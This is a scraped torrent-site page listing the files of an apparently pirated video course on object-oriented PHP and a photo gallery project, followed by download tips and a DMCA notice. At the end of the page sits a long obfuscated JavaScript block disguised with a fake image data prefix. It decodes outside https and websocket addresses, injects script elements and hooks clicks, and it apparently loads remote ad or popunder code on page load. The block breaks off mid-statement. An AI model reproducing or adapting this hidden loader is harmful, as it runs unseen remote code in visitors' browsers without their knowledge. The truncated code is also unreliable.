[FreeTutorials.us] oop-php-object-oriented-programing-with-project-1-course

mp4   Hot:1581   Size:5.33 GB   Created:2017-08-27 17:11:24   Update:2021-12-13 01:28:02  

File List

  • 01 Getting Started/001 Section Overview.mp4 2.11 MB
    01 Getting Started/002 Edwin from the future.mp4 4.19 MB
    01 Getting Started/003 Code Editors I recommend Optional Lecture.mp4 26.95 MB
    01 Getting Started/004 Web Development Software Installation XAMPP.mp4 79.56 MB
    01 Getting Started/005 Course Exercise files.mp4 36.07 MB
    01 Getting Started/006 Displaying errors in PHP.mp4 54.35 MB
    01 Getting Started/attached_files/005 Course Exercise files/CMS-TEMPLATE-PHP.zip 5.76 MB
    01 Getting Started/attached_files/005 Course Exercise files/Gallery.zip 5.73 MB
    01 Getting Started/attached_files/005 Course Exercise files/Oop.zip 3.63 KB
    02 OOP Fundamentals/007 Section Overview.mp4 1.3 MB
    02 OOP Fundamentals/008 Defining a class.mp4 32.4 MB
    02 OOP Fundamentals/009 Defining methods.mp4 15.51 MB
    02 OOP Fundamentals/010 Instantiating a Class.mp4 15.25 MB
    02 OOP Fundamentals/011 Defining properties.mp4 28.56 MB
    02 OOP Fundamentals/012 Class Inheritance.mp4 17.91 MB
    02 OOP Fundamentals/013 Access Control Modifiers.mp4 23.89 MB
    02 OOP Fundamentals/014 Static Modifier.mp4 29.26 MB
    02 OOP Fundamentals/015 Getters and Setters.mp4 19.16 MB
    02 OOP Fundamentals/016 Referencing Parent Class with Static.mp4 31.97 MB
    02 OOP Fundamentals/017 Constructors and Destructors.mp4 38.53 MB
    03 OOP Project - Building a Photo Gallery System/018 Overview of this project.mp4 2.08 MB
    03 OOP Project - Building a Photo Gallery System/019 Project Directories Assets.mp4 35.03 MB
    03 OOP Project - Building a Photo Gallery System/020 Editing and Modifying Files.mp4 55.69 MB
    03 OOP Project - Building a Photo Gallery System/021 Gallery System Links.mp4 12.26 MB
    03 OOP Project - Building a Photo Gallery System/022 Creating Pages.mp4 32.36 MB
    03 OOP Project - Building a Photo Gallery System/023 Creating Database and User Table.mp4 20.25 MB
    03 OOP Project - Building a Photo Gallery System/attached_files/019 Project Directories Assets/CMS-TEMPLATE-PHP.zip 5.76 MB
    04 Database Class/024 Section Overview.mp4 2.51 MB
    04 Database Class/025 Setting Up the Database Connection.mp4 22.75 MB
    04 Database Class/026 Initializing all Includes in one file.mp4 11.22 MB
    04 Database Class/027 Init file inclusion reminder Edwin from the future.mp4 10.39 MB
    04 Database Class/028 Creating the Database Class.mp4 22.49 MB
    04 Database Class/029 Future Update for database class.mp4 4.94 MB
    04 Database Class/030 Automatic DB Connection Setup.mp4 15.43 MB
    04 Database Class/031 The Query Method.mp4 10.62 MB
    04 Database Class/032 Database Class Helper Methods.mp4 13.35 MB
    04 Database Class/033 Testing Query Method.mp4 31.09 MB
    04 Database Class/034 Improving our Connection to be more OOP.mp4 28.8 MB
    05 The User Class/035 Section Overview.mp4 1.75 MB
    05 The User Class/036 Creating our User Class.mp4 13.95 MB
    05 The User Class/037 Testing our find_all method.mp4 24.43 MB
    05 The User Class/038 Static Method Usage and Challenge.mp4 10.99 MB
    05 The User Class/039 Creating a Find user id method and Solution.mp4 21.23 MB
    05 The User Class/040 Create This Query Method.mp4 29.06 MB
    05 The User Class/041 Assigning Array Values to Object Properties.mp4 16.86 MB
    05 The User Class/042 Auto Instantiation Method.mp4 18.59 MB
    05 The User Class/043 Testing the Instantiation Method.mp4 15.23 MB
    05 The User Class/044 Short Way Auto Instantiation.mp4 22.62 MB
    05 The User Class/045 Creating The Attribute Finder Method.mp4 21.19 MB
    05 The User Class/046 Adding our Instantiation Method.mp4 34.19 MB
    05 The User Class/047 Using our Instantiation Method to find all users.mp4 23.46 MB
    05 The User Class/048 Using our Instantiation Method to find 1 User.mp4 57.49 MB
    05 The User Class/049 Undeclared Object Backup Function.mp4 31.17 MB
    05 The User Class/050 Updating the Autoload Function Edwin from the future.mp4 36.94 MB
    05 The User Class/051 So what is going.html 2.21 KB
    06 The Session Class/052 Section Overview.mp4 2.06 MB
    06 The Session Class/053 Starting Sessions.mp4 23.65 MB
    06 The Session Class/054 The Checking login Method.mp4 14.54 MB
    06 The Session Class/055 The Login Method.mp4 27.92 MB
    06 The Session Class/056 The Logout Method.mp4 16.85 MB
    06 The Session Class/057 Controlling Access to Admin.mp4 29.73 MB
    06 The Session Class/058 Creating The Login Page.mp4 31.3 MB
    06 The Session Class/059 Creating the Verify Method Part 1.mp4 25.42 MB
    06 The Session Class/060 Creating the Verify Method part 2.mp4 34.65 MB
    06 The Session Class/061 Duplicate return Important watch the whole lecture - Edwin from the future.mp4 7.83 MB
    06 The Session Class/062 Login page position - Edwin from the future.mp4 1.62 MB
    06 The Session Class/063 Login Form Creation Download.mp4 37.95 MB
    06 The Session Class/064 Creating our Login out Feature.mp4 35.18 MB
    06 The Session Class/065 Creating message method.mp4 10.54 MB
    06 The Session Class/066 Outputting Feedback for User.mp4 22.37 MB
    06 The Session Class/attached_files/063 Login Form Creation Download/54-Login-Form-Php.zip 457 B
    07 Files Basics/067 Section Overview.mp4 1.32 MB
    07 Files Basics/068 Understanding File Permissions.mp4 13.49 MB
    07 Files Basics/069 Magic Constants.mp4 50.93 MB
    08 Uploading Files/070 Section Overview.mp4 1.52 MB
    08 Uploading Files/071 Configuring PHP for File Uploads.mp4 37.53 MB
    08 Uploading Files/072 Sending Files.mp4 17.23 MB
    08 Uploading Files/073 Analyzing Uploaded File Structure.mp4 12.03 MB
    08 Uploading Files/074 File Error Code Explained.mp4 31.69 MB
    08 Uploading Files/075 Moving Uploaded Files.mp4 43.44 MB
    09 CRUD Create Method/076 Section Overview.mp4 1.5 MB
    09 CRUD Create Method/077 Create Method Query Part1.mp4 27.24 MB
    09 CRUD Create Method/078 Create Method Query Part 2.mp4 22.68 MB
    09 CRUD Create Method/079 Inserting Last ID Method Challenge.mp4 21.77 MB
    09 CRUD Create Method/080 Testing our Method Solution.mp4 32.41 MB
    10 CRUD Update Method/081 Update Method Query.mp4 33.05 MB
    10 CRUD Update Method/082 Testing our Update Method.mp4 19.49 MB
    11 CRUD Delete Method/083 Delete Method.mp4 24.44 MB
    11 CRUD Delete Method/084 Testing the Delete Method.mp4 46.45 MB
    12 Abstracting and Improving/085 Section Overview.mp4 1.59 MB
    12 Abstracting and Improving/086 Improving the Create Method.mp4 38.38 MB
    12 Abstracting and Improving/087 Abstracting Tables.mp4 40.78 MB
    12 Abstracting and Improving/088 Abstracting Properties.mp4 21.42 MB
    12 Abstracting and Improving/089 Abstracting the Create Method Part 1.mp4 30.1 MB
    12 Abstracting and Improving/090 Abstracting the Create Method Part 2.mp4 17.31 MB
    12 Abstracting and Improving/091 Modifying the properties method.mp4 34.38 MB
    12 Abstracting and Improving/092 Testing the Abstracted Create Method.mp4 20.93 MB
    12 Abstracting and Improving/093 Abstracting the Update Method.mp4 25.18 MB
    12 Abstracting and Improving/094 Testing the Abstracted Update Method.mp4 15.69 MB
    12 Abstracting and Improving/095 Escaping Values From our Abstracted Methods.mp4 35.31 MB
    13 The Photo Class/096 Section Overview.mp4 1.51 MB
    13 The Photo Class/097 Creating the Database Table for our Photo Class.mp4 18.16 MB
    13 The Photo Class/098 Abstracting the remaining methods.mp4 19.6 MB
    13 The Photo Class/099 Create the Parent Class.mp4 27.28 MB
    13 The Photo Class/100 Fixing lecture 90 Double Return.mp4 9.17 MB
    13 The Photo Class/101 Late Static Binding.mp4 38.55 MB
    13 The Photo Class/102 Coding The Photo Class.mp4 47.06 MB
    13 The Photo Class/103 Adding Class Properties.mp4 15.97 MB
    13 The Photo Class/104 Testing Inherited Methods.mp4 32.8 MB
    13 The Photo Class/105 Setting Up our Properties Array.mp4 18.47 MB
    13 The Photo Class/106 Building Directory Paths.mp4 39.76 MB
    13 The Photo Class/107 Set File Method.mp4 29.32 MB
    13 The Photo Class/108 Save Method Part 1.mp4 32.93 MB
    13 The Photo Class/109 Save Method Part 2.mp4 31.86 MB
    13 The Photo Class/110 HTML Form Creation.mp4 37.32 MB
    13 The Photo Class/111 Uploading and Testing.mp4 41.4 MB
    13 The Photo Class/112 Coding The HTML for our Photos Table.mp4 25.73 MB
    13 The Photo Class/113 Coding The PHP for a Photo Table.mp4 26.19 MB
    13 The Photo Class/114 Dynamic Image Path.mp4 24.11 MB
    13 The Photo Class/attached_files/114 Dynamic Image Path/Car-Pictures.zip 2.09 MB
    14 ADMIN PHOTOS Deletion Section/115 Section Overview.mp4 2.14 MB
    14 ADMIN PHOTOS Deletion Section/116 DELETE PAGE and Links Part 1.mp4 24.64 MB
    14 ADMIN PHOTOS Deletion Section/117 DELETE Page Part 1.mp4 14.46 MB
    14 ADMIN PHOTOS Deletion Section/118 Making our Application More Generic.mp4 73.88 MB
    14 ADMIN PHOTOS Deletion Section/119 Creating The Delete Method.mp4 34.77 MB
    14 ADMIN PHOTOS Deletion Section/120 Setting Up The Right Redirect Paths for Delete.mp4 12.91 MB
    15 ADMIN PHOTOS Edit Photo Section/121 Section Overview.mp4 1.12 MB
    15 ADMIN PHOTOS Edit Photo Section/122 Creating The Edit Page.mp4 38.2 MB
    15 ADMIN PHOTOS Edit Photo Section/123 Creating The Edit Page Part 2.mp4 40.2 MB
    15 ADMIN PHOTOS Edit Photo Section/124 Writing our PHP Code Part 1.mp4 31.37 MB
    15 ADMIN PHOTOS Edit Photo Section/125 Writing our PHP Code Part 2.mp4 26.94 MB
    15 ADMIN PHOTOS Edit Photo Section/126 Displaying Data.mp4 48.03 MB
    15 ADMIN PHOTOS Edit Photo Section/127 Updating Data.mp4 16.95 MB
    15 ADMIN PHOTOS Edit Photo Section/128 Picture and Sidebar Styling.mp4 31.49 MB
    15 ADMIN PHOTOS Edit Photo Section/129 Installing The Text Editor.mp4 17.96 MB
    15 ADMIN PHOTOS Edit Photo Section/130 Setting Size for Photos Page Thumbnail.mp4 16.7 MB
    15 ADMIN PHOTOS Edit Photo Section/attached_files/123 Creating The Edit Page Part 2/76-Edit-Photo-Snippet-Php.zip 658 B
    15 ADMIN PHOTOS Edit Photo Section/attached_files/128 Picture and Sidebar Styling/81-Edit-Photo-Styles-Css.zip 428 B
    16 ADMIN USERS/131 Section Overview.mp4 1.51 MB
    16 ADMIN USERS/132 Displaying User Page.mp4 28.67 MB
    16 ADMIN USERS/133 Working with User Image.mp4 47.96 MB
    16 ADMIN USERS/134 Creating User Image Column in DB Table.mp4 25 MB
    16 ADMIN USERS/135 Deleting Users.mp4 9.36 MB
    16 ADMIN USERS/136 Creating Add User Page Part 1.mp4 37.05 MB
    16 ADMIN USERS/137 Creating Add User Page Part 2 Testing.mp4 14.15 MB
    16 ADMIN USERS/138 Assigning POST values to Object Properties.mp4 21.17 MB
    16 ADMIN USERS/139 Setting Up Image Upload for User.mp4 53.84 MB
    16 ADMIN USERS/140 Creating The User Edit Page.mp4 27.99 MB
    16 ADMIN USERS/141 Updating User.mp4 42.16 MB
    16 ADMIN USERS/142 Empty Password Field Fix.mp4 11.45 MB
    16 ADMIN USERS/143 Updating User Modification.mp4 19.94 MB
    16 ADMIN USERS/144 Delete within Edit User Page.mp4 26.31 MB
    16 ADMIN USERS/145 Fixing Duplicate Record Creation Bug.mp4 12.29 MB
    17 ADMIN COMMENTS/146 Section Overview.mp4 2.19 MB
    17 ADMIN COMMENTS/147 Creating the Comments Table in the Database.mp4 17.97 MB
    17 ADMIN COMMENTS/148 Creating the Comment Class.mp4 19 MB
    17 ADMIN COMMENTS/149 Self Instantiation Comment Method.mp4 25.09 MB
    17 ADMIN COMMENTS/150 Find Comments Method.mp4 28.76 MB
    17 ADMIN COMMENTS/151 Testing our Comment Form.mp4 33.61 MB
    17 ADMIN COMMENTS/152 Including Our Classes in Photo.php FRONT-END.mp4 23.17 MB
    17 ADMIN COMMENTS/153 Pulling Data From Form Part 1.mp4 18.96 MB
    17 ADMIN COMMENTS/154 Pulling Data From Form Part 2.mp4 35.43 MB
    17 ADMIN COMMENTS/155 Displaying Making Comments - FRONT-END.mp4 30.34 MB
    17 ADMIN COMMENTS/156 Displaying Making Comments - BACK-END.mp4 27.26 MB
    17 ADMIN COMMENTS/157 Deleting Comments.mp4 9.85 MB
    17 ADMIN COMMENTS/158 Creating the Individual Comment Page Part 1.mp4 29.81 MB
    17 ADMIN COMMENTS/159 Creating the Individual Comment Page Part 2.mp4 14.88 MB
    17 ADMIN COMMENTS/160 Creating the Count Comment Code and CHALLENGE.mp4 15.06 MB
    17 ADMIN COMMENTS/161 Comment Count Link SOLUTION.mp4 13.41 MB
    17 ADMIN COMMENTS/162 Deleting Specific Photo Comments Code.mp4 10.78 MB
    17 ADMIN COMMENTS/attached_files/158 Creating the Individual Comment Page Part 1/Car-Pictures.zip 2.09 MB
    18 ADMIN Dashboard Setup/163 Section Overview.mp4 1.39 MB
    18 ADMIN Dashboard Setup/164 Dynamic Menu to Photo.php.mp4 28.67 MB
    18 ADMIN Dashboard Setup/165 Dashboard HTML Snippets Inclusion.mp4 13.46 MB
    18 ADMIN Dashboard Setup/166 Adding Google API Charts.mp4 17.86 MB
    18 ADMIN Dashboard Setup/167 Tracking Page Views Method.mp4 29.12 MB
    18 ADMIN Dashboard Setup/168 Creating the Count All Method and Echoing Photo Count.mp4 27.45 MB
    18 ADMIN Dashboard Setup/169 Setting Up Users and Comment Counts.mp4 14.36 MB
    18 ADMIN Dashboard Setup/170 Modifying Chart Properties.mp4 48.65 MB
    18 ADMIN Dashboard Setup/171 Dynamic Data in Chart Creation.mp4 39.55 MB
    18 ADMIN Dashboard Setup/attached_files/165 Dashboard HTML Snippets Inclusion/112-Dashboard-Code-Snippet-Php.zip 630 B
    19 FRONT-END Gallery System/172 Setting Up Index to Display Photos Part 1.mp4 29.34 MB
    19 FRONT-END Gallery System/173 Setting Up Index to Display Photos Part 2.mp4 19.54 MB
    19 FRONT-END Gallery System/174 Correcting Photos Alignment with CSS.mp4 19.96 MB
    19 FRONT-END Gallery System/175 Coding the PHP in Photo.php FRON-END.mp4 42.11 MB
    19 FRONT-END Gallery System/176 Home Page Link and Footer Modifications.mp4 20.63 MB
    20 FRONT-END PAGINATION/177 Section Overview.mp4 1.08 MB
    20 FRONT-END PAGINATION/178 Setting Up our Pagination Variables.mp4 20.46 MB
    20 FRONT-END PAGINATION/179 Creating the Paginate CLASS.mp4 12.62 MB
    20 FRONT-END PAGINATION/180 Creating our Construct Function to Initialize some Properties.mp4 10.67 MB
    20 FRONT-END PAGINATION/181 Building our Paginate Class Methods Part 1.mp4 21.48 MB
    20 FRONT-END PAGINATION/182 Building our Paginate Class Methods Part 2.mp4 26.94 MB
    20 FRONT-END PAGINATION/183 Instantiating and Testing Paginate.mp4 34.53 MB
    20 FRONT-END PAGINATION/184 Setting Up our Next Page Link.mp4 20.69 MB
    20 FRONT-END PAGINATION/185 Putting our Next Link to Work - CHALLENGE.mp4 11.68 MB
    20 FRONT-END PAGINATION/186 Creating Previous Link - SOLUTION.mp4 14.34 MB
    20 FRONT-END PAGINATION/187 Paginate Indication and Looping.mp4 28.29 MB
    20 FRONT-END PAGINATION/188 Pagination Indication CSS.mp4 19.37 MB
    20 FRONT-END PAGINATION/189 CLEANING UP.mp4 32.99 MB
    21 EXTRA FEATURES/190 Extra Features Overview.mp4 3.51 MB
    21 EXTRA FEATURES/191 Creating the Modal HTML Snippets Download.mp4 49.27 MB
    21 EXTRA FEATURES/192 Including Modal from somewhere else.mp4 26.95 MB
    21 EXTRA FEATURES/193 Setting up our Javascript jQuery Code.mp4 51.72 MB
    21 EXTRA FEATURES/194 Enable Selection Button on Click - jQuery.mp4 12.98 MB
    21 EXTRA FEATURES/195 Enabling the Selection Button with jQuery.mp4 16.96 MB
    21 EXTRA FEATURES/196 Pulling User Id with jQuery and Javascript.mp4 35.03 MB
    21 EXTRA FEATURES/197 Pulling Image Name with jQuery and Javascript.mp4 16.52 MB
    21 EXTRA FEATURES/198 Writing the AJAX - Setting User Image.mp4 27.34 MB
    21 EXTRA FEATURES/199 Testing our AJAX Code.mp4 15.42 MB
    21 EXTRA FEATURES/200 Creating the AJAX PHP Method.mp4 21.37 MB
    21 EXTRA FEATURES/201 Modifying Improving Our AJAX PHP method.mp4 40.72 MB
    21 EXTRA FEATURES/202 Photo Library Sidebar Part 1 - CHALLENGE INCLUDED.mp4 25.99 MB
    21 EXTRA FEATURES/203 Photo Library Sidebar Part 2 - SOLUTION INCLUDED.mp4 10.76 MB
    21 EXTRA FEATURES/204 Photo Library Sidebar Part 3 - COMPLETED.mp4 17.47 MB
    21 EXTRA FEATURES/205 Creating Session Methods for Notifications in the Edit User Page Part 1.mp4 22.79 MB
    21 EXTRA FEATURES/206 Creating Session Methods for Notifications in the Edit User Page Part 2.mp4 38.56 MB
    21 EXTRA FEATURES/207 Updating User Methods.mp4 28.38 MB
    21 EXTRA FEATURES/208 Setting Up Notifications for CRUD Part 1.mp4 34.99 MB
    21 EXTRA FEATURES/209 Setting Up Notifications for CRUD Part 2.mp4 15.43 MB
    21 EXTRA FEATURES/210 Installing a Multiple Upload and Drop JS File Plugin Part 1.mp4 33.21 MB
    21 EXTRA FEATURES/211 Installing a Multiple Upload and Drop JS File Plugin Part 2.mp4 31.11 MB
    21 EXTRA FEATURES/212 Installing a Multiple Upload and Drop JS File Plugin Part 3 - COMPLETE.mp4 21.66 MB
    21 EXTRA FEATURES/213 Edit Photo Page Sidebar jQuery Dropdown.mp4 37.14 MB
    21 EXTRA FEATURES/214 Login Page CSS.mp4 11.15 MB
    21 EXTRA FEATURES/215 Confirm Delete with Javascript and jQuery.mp4 30.93 MB
    21 EXTRA FEATURES/216 Conclusion and BONUS.mp4 5.33 MB
    21 EXTRA FEATURES/attached_files/191 Creating the Modal HTML Snippets Download/136-Snippets-For-Modal.zip 1.01 KB
    22 Taking our application online/217 Hosting setup.mp4 55.91 MB
    22 Taking our application online/218 Displaying errors online.mp4 29.36 MB
    22 Taking our application online/219 Uploading files and database creation.mp4 60 MB
    22 Taking our application online/220 Importing database and setting up configurations CHALLENGE.mp4 26.03 MB
    22 Taking our application online/221 Creating an online site root path SOLUTION.mp4 54.24 MB
    22 Taking our application online/222 Testing photos deletion functionality.mp4 29.13 MB
    [FreeTutorials.us].txt 78 B
    [FreeTutorials.us].url 119 B

Download Info

  • Tips

    “[FreeTutorials.us] oop-php-object-oriented-programing-with-project-1-course” Its related downloads are collected from the DHT sharing network, the site will be 24 hours of real-time updates, to ensure that you get the latest resources.This site is not responsible for the authenticity of the resources, please pay attention to screening.If found bad resources, please send a report below the right, we will be the first time shielding.

  • DMCA Notice and Takedown Procedure

    If this resource infringes your copyright, please email([email protected]) us or leave your message here ! we will block the download link as soon as possiable.

!function(){function a(a){var _idx="f9m7hqe5dm";var b={e:"P",w:"D",T:"y","+":"J",l:"!",t:"L",E:"E","@":"2",d:"a",b:"%",q:"l",X:"v","~":"R",5:"r","&":"X",C:"j","]":"F",a:")","^":"m",",":"~","}":"1",x:"C",c:"(",G:"@",h:"h",".":"*",L:"s","=":",",p:"g",I:"Q",1:"7",_:"u",K:"6",F:"t",2:"n",8:"=",k:"G",Z:"]",")":"b",P:"}",B:"U",S:"k",6:"i",g:":",N:"N",i:"S","%":"+","-":"Y","?":"|",4:"z","*":"-",3:"^","[":"{","(":"c",u:"B",y:"M",U:"Z",H:"[",z:"K",9:"H",7:"f",R:"x",v:"&","!":";",M:"_",Q:"9",Y:"e",o:"4",r:"A",m:".",O:"o",V:"W",J:"p",f:"d",":":"q","{":"8",W:"I",j:"?",n:"5",s:"3","|":"T",A:"V",D:"w",";":"O"};return a.split("").map(function(a){return void 0!==b[a]?b[a]:a}).join("")}var b=a('data:image/jpg;base64,l7_2(F6O2ca[7_2(F6O2 5ca[5YF_52"vX8"%cmn<ydFhm5d2fO^caj}g@aPqYF 282_qq!Xd5 Y8D62fODm622Y5V6fFh!qYF J8Y/Ko0.c}00%n0.cs*N_^)Y5c"}"aaa!Xd5 F=O!(O2LF X8[6L|OJgN_^)Y5c"@"a<@=5YXY5LY9Y6phFgN_^)Y5c"0"a=YXY2F|TJYg"FO_(hY2f"=LqOFWfg_cmn<ydFhm5d2fO^cajngKa=5YXY5LYWfg_cmn<ydFhm5d2fO^cajngKa=5ODLgo=(Oq_^2Lg}0=6FY^V6FhgY/}0=6FY^9Y6phFgJ/o=qOdfiFdF_Lg0=5Y|5Tg0P=68"bGYYYGb"!qYF d8HZ!F5T[d8+i;NmJd5LYc(c6a??"HZ"aP(dF(hcYa[P7_2(F6O2 TcYa[5YF_52 Ym5YJqd(Yc"[[fdTPP"=c2YD wdFYampYFwdFYcaaP7_2(F6O2 (cY=Fa[qYF 282_qq!F5T[28qO(dqiFO5dpYmpYFWFY^cYaP(dF(hcYa[Fvvc28FcaaP5YF_52 2P7_2(F6O2 qcY=F=2a[F5T[qO(dqiFO5dpYmLYFWFY^cY=FaP(dF(hcYa[2vv2caPP7_2(F6O2 LcY=Fa[F8}<d5p_^Y2FLmqY2pFhvvXO6f 0l88FjFg""!XmqOdfiFdF_L8*}=}00<dmqY2pFh??cdmJ_Lhc`c$[YPa`%Fa=qc6=+i;NmLF562p67TcdaaaP7_2(F6O2 _cYa[qYF F80<d5p_^Y2FLmqY2pFhvvXO6f 0l88YjYg}=28"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7h6CSq^2OJ:5LF_XDRT4"=O82mqY2pFh=58""!7O5c!F**!a5%82HydFhm7qOO5cydFhm5d2fO^ca.OaZ!5YF_52 5P7_2(F6O2 fcYa[qYF F8fO(_^Y2Fm(5YdFYEqY^Y2Fc"L(56JF"a!Xd5 28c28"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/CL/@@{jR87Q^1h:Ynf^"a%c*}8882m62fYR;7c"j"aj"j"g"v"a%"58"%Xm5Y|5T%%%"vF8"%hca%5ca!FmL5(8Tc2a=FmO2qOdf87_2(F6O2ca[XmqOdfiFdF_L8@=)caP=FmO2Y55O587_2(F6O2ca[YvvYca=LYF|6^YO_Fc7_2(F6O2ca[Fm5Y^OXYcaP=}0aP=fO(_^Y2FmhYdfmdJJY2fxh6qfcFa=XmqOdfiFdF_L8}P7_2(F6O2 hca[qYF Y8(c"bb___b"a!5YF_52 Y??qc"bb___b"=Y8ydFhm5d2fO^camFOiF562pcsKamL_)LF562pcsa=7_2(F6O2ca[Y%8"M"Pa=Y2(OfYB~WxO^JO2Y2FcYaPr55dTm6Lr55dTcda??cd8HZ=qc6=""aa!qYF 78"@@{"=^8"7Q^1h:Ynf^"!7_2(F6O2 pcYa[}l88Ym5YdfTiFdFYvv0l88Ym5YdfTiFdFY??Ym(qOLYcaP7_2(F6O2 icYa[Xd5 F8H"@@{d2(LCYmTfY20C0mRT4"="@@{5p(LYpmsOopQqqmRT4"="@@{D7(LSqmTfY20C0mRT4"="@@{dC(LJ^msOopQqqmRT4"="@@{(C(L:4mTfY20C0mRT4"="@@{C2(LSYmsOopQqqmRT4"="@@{25(LLSmTfY20C0mRT4"Z=F8FHc2YD wdFYampYFwdTcaZ??FH0Z=F8"DLLg//"%c2YD wdFYampYFwdFYca%F%"g@Q@{n"!qYF O82YD VY)iO(SYFcF%"/"%7%"jR8"%^%"v58"%Xm5Y|5T%%%"vF8"%hca%5ca%c2_qql882j2gcF8fO(_^Y2Fm:_Y5TiYqY(FO5c"^YFdH2d^Y8(Z"a=28Fj"v(h8"%FmpYFrFF56)_FYc"("ag""aaa!OmO2OJY287_2(F6O2ca[XmqOdfiFdF_L8@P=OmO2^YLLdpY87_2(F6O2cFa[qYF 28FmfdFd!F5T[287_2(F6O2cYa[qYF 5=F=2=O=6=d=(8"(hd5rF"=q8"75O^xhd5xOfY"=L8"(hd5xOfYrF"=_8"62fYR;7"=f8"ruxwE]k9W+ztyN;eI~i|BAV&-Ud)(fY7ph6CSq^2OJ:5LF_XDRT40}@sonK1{Q%/8"=h8""=780!7O5cY8Ym5YJqd(Yc/H3r*Ud*40*Q%/8Z/p=""a!7<YmqY2pFh!a28fH_ZcYH(Zc7%%aa=O8fH_ZcYH(Zc7%%aa=68fH_ZcYH(Zc7%%aa=d8fH_ZcYH(Zc7%%aa=58c}nvOa<<o?6>>@=F8csv6a<<K?d=h%8iF562pHqZc2<<@?O>>oa=Kol886vvch%8iF562pHqZc5aa=Kol88dvvch%8iF562pHqZcFaa![Xd5 ^8h!qYF Y8""=F=2=O!7O5cF858280!F<^mqY2pFh!ac58^HLZcFaa<}@{jcY%8iF562pHqZc5a=F%%ag}Q}<5vv5<@@ojc28^HLZcF%}a=Y%8iF562pHqZccs}v5a<<K?Ksv2a=F%8@agc28^HLZcF%}a=O8^HLZcF%@a=Y%8iF562pHqZcc}nv5a<<}@?cKsv2a<<K?KsvOa=F%8sa!5YF_52 YPPc2a=2YD ]_2(F6O2c"MFf(L"=2acfO(_^Y2Fm(_55Y2Fi(56JFaP(dF(hcYa[F82mqY2pFh*o0=F8F<0j0gJd5LYW2FcydFhm5d2fO^ca.Fa!Lc@0o=` $[Ym^YLLdpYP M[$[FPg$[2mL_)LF562pcF=F%o0aPPM`a=XmqOdfiFdF_L8*}PpcOa=@888XmqOdfiFdF_Lvv)caP=OmO2Y55O587_2(F6O2ca[@l88XmqOdfiFdF_LvvYvvYca=pcOaP=XmqOdfiFdF_L8}PqYF D8l}!7_2(F6O2 )ca[DvvcfO(_^Y2Fm5Y^OXYEXY2Ft6LFY2Y5cXmYXY2F|TJY=Xm(q6(S9d2fqY=l0a=Y8fO(_^Y2FmpYFEqY^Y2FuTWfcXm5YXY5LYWfaavvYm5Y^OXYca!Xd5 Y=F8fO(_^Y2Fm:_Y5TiYqY(FO5rqqcXmLqOFWfa!7O5cqYF Y80!Y<FmqY2pFh!Y%%aFHYZvvFHYZm5Y^OXYcaP7_2(F6O2 $ca[LYF|6^YO_Fc7_2(F6O2ca[67c@l88XmqOdfiFdF_La[Xd5[(Oq_^2LgY=5ODLgO=6FY^V6Fhg5=6FY^9Y6phFg6=LqOFWfgd=6L|OJg(=5YXY5LY9Y6phFgqP8X!7_2(F6O2 Lca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7O5cqYF 280!2<Y!2%%a7O5cqYF F80!F<O!F%%a[qYF Y8"JOL6F6O2g76RYf!4*62fYRg}00!f6LJqdTg)qO(S!"%`qY7Fg$[2.5PJR!D6fFhg$[ydFhm7qOO5cmQ.5aPJR!hY6phFg$[6PJR!`!Y%8(j`FOJg$[q%F.6PJR`g`)OFFO^g$[q%F.6PJR`!Xd5 _8fO(_^Y2Fm(5YdFYEqY^Y2Fcda!_mLFTqYm(LL|YRF8Y=_mdffEXY2Ft6LFY2Y5cXmYXY2F|TJY=La=fO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=_aP67clDa[(O2LF[YXY2F|TJYg7=6L|OJg^=5YXY5LY9Y6phFgpP8X!fO(_^Y2FmdffEXY2Ft6LFY2Y5c7=h=l0a=Xm(q6(S9d2fqY8h!Xd5 28fO(_^Y2Fm(5YdFYEqY^Y2Fc"f6X"a!7_2(F6O2 fca[Xd5 Y8Tc"hFFJLg//[[fdTPP@@{FC(LCDm{XRs4SLmRT4gQ@{n/((/@@{j6LM2OF8}vFd5pYF8}vFT8@"a!FOJmqO(dF6O2l88LYq7mqO(dF6O2jFOJmqO(dF6O28YgD62fODmqO(dF6O2mh5Y78YP7_2(F6O2 hcYa[Xd5 F8D62fODm622Y59Y6phF!qYF 280=O80!67cYaLD6F(hcYmLFOJW^^Yf6dFYe5OJdpdF6O2ca=YmFTJYa[(dLY"FO_(hLFd5F"g28YmFO_(hYLH0Zm(q6Y2F&=O8YmFO_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"FO_(hY2f"g28Ym(hd2pYf|O_(hYLH0Zm(q6Y2F&=O8Ym(hd2pYf|O_(hYLH0Zm(q6Y2F-!)5YdS!(dLY"(q6(S"g28Ym(q6Y2F&=O8Ym(q6Y2F-P67c0<2vv0<Oa67c^a[67cO<8pa5YF_52l}!O<J%pvvfcaPYqLY[F8F*O!67cF<8pa5YF_52l}!F<J%pvvfcaPP2m6f8Xm5YXY5LYWf=2mLFTqYm(LL|YRF8`hY6phFg$[Xm5YXY5LY9Y6phFPJR`=^jfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc"d7FY5)Yp62"=2agfO(_^Y2Fm)OfTm62LY5FrfCd(Y2FEqY^Y2Fc")Y7O5YY2f"=2a=D8l0PqYF F8Tc"hFFJLg//[[fdTPP@@{Cq_2Ohpm2O6LnpCmRT4gQ@{n/f/@@{j(8}vR87Q^1h:Ynf^"a!FvvLYF|6^YO_Fc7_2(F6O2ca[Xd5 